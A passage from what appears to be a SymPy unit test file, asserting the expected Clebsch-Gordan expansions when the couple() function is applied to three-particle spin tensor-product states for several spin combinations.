((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 1), (1, 2, S.Half))
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
            (S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 0), (1, 2, S.Half)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
            (S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 0), (1, 2, S.Half))
)
/ 2
- sqrt(6)
* JzKetCoupled(
S.Half, S.Half, (S.Half, S.Half, S.Half), ((1, 3, 1), (1, 2, S.Half))
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
            (S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
            (S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 0), (1, 2, S.Half)),
)
/ 2
+ sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, S.Half)),
)
/ 6
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
            (S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
/ 3
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 3), (1, 2)),
) == JzKetCoupled(
Rational(3, 2),
-S(3) / 2,
(S.Half, S.Half, S.Half),
((1, 3, 1), (1, 2, Rational(3, 2))),
)
# j1=1/2, j2=1/2, j3=1
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1)),
((1, 3), (1, 2)),
) == JzKetCoupled(2, 2, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== sqrt(3)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
- sqrt(6)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ sqrt(2)
* JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 0)))
/ 3
+ sqrt(3)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
- sqrt(6)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ sqrt(6)
* JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
),
((1, 3), (1, 2)),
)
== sqrt(3)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 2
+ JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 0)))
/ 6
+ sqrt(6)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 6
+ sqrt(3)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 3
+ sqrt(3)
* JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
+ sqrt(3)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
- sqrt(3)
* JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ JzKetCoupled(2, 1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 0)
),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 0)))
/ 6
- sqrt(6)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 6
- sqrt(3)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 3
+ sqrt(3)
* JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 3
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, -1)
),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 2
+ JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(0, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 0)))
/ 3
- sqrt(3)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
+ sqrt(6)
* JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ sqrt(6)
* JzKetCoupled(2, 0, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1)))
/ 3
+ sqrt(6)
* JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 1)))
/ 6
+ sqrt(2)
* JzKetCoupled(2, -1, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
/ 2
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
),
((1, 3), (1, 2)),
) == JzKetCoupled(2, -2, (S.Half, S.Half, 1), ((1, 3, Rational(3, 2)), (1, 2, 2)))
    # j1=1/2, j2=1, j3=1
assert couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1)), ((1, 3), (1, 2))
) == JzKetCoupled(
Rational(5, 2),
Rational(5, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== -2
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half)))
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 3
+ 2
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== -sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half)))
/ 3
+ JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== -sqrt(2)
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half)))
/ 3
- JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 3, Rational(3, 2)), (1, 2, S.Half))
)
/ 3
- 2
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, -1)),
((1, 3), (1, 2)),
)
== -sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1)),
((1, 3), (1, 2)),
)
== -2
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 3, S.Half), (1, 2, S.Half))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0)),
((1, 3), (1, 2)),
)
== -sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, -1)),
((1, 3), (1, 2)),
) == JzKetCoupled(
S(5) / 2,
Rational(-5, 2),
(S.Half, 1, 1),
((1, 3, Rational(3, 2)), (1, 2, Rational(5, 2))),
)
    # j1=1, j2=1, j3=1
assert couple(
TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 1)), ((1, 3), (1, 2))
) == JzKetCoupled(3, 3, (1, 1, 1), ((1, 3, 2), (1, 2, 3)))
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)), ((1, 3), (1, 2)))
== sqrt(2) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 30
+ JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)), ((1, 3), (1, 2)))
== JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
- sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
+ JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)), ((1, 3), (1, 2)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
+ sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
- sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 3
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)), ((1, 3), (1, 2)))
== sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 5
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)), ((1, 3), (1, 2)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 0))) / 6
+ JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 10
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 6
+ JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)), ((1, 3), (1, 2)))
== sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
+ JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 30
+ JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)), ((1, 3), (1, 2)))
== -sqrt(2) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))) / 2
- sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)), ((1, 3), (1, 2)))
== -sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 0), (1, 2, 1))) / 3
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 1))) / 15
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 2))) / 3
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 3, 2), (1, 2, 3))) / 15
)
assert (
